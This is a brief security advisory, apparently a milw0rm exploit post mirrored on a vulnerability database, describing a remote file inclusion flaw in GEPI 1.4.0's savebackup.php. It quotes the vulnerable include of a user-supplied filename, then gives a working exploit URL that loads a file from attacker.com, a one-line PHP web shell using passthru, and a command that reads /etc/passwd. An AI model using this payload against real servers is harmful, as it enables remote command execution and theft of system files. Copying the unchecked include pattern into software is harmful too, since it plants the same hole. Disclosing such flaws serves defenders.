Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14876
HistoryOct 31, 2006 - 12:00 a.m.

GEPI <= 1.4.0 gestion/savebackup.php Remote File Include Vulnerability

2006-10-3100:00:00
vulners.com
42

Package:- gepi 1.4.0
http://adullact.net/frs/download.php/992/gepi-1.4.0.tar.gz

impact:- highly critical …System Access…
vulnerable code:-
include($_GET['filename']);
in gepi/gestion/savebackup.php

Exploit:-
http://localhost/gepi/gestion/savebackup.php?filename=http://attacker.com/test.txt&cmd=cat
/etc/passwd

in test.txt
<? passthru("$_GET[cmd]");?>

Credits:-
$um$id

milw0rm.com [2006-10-31]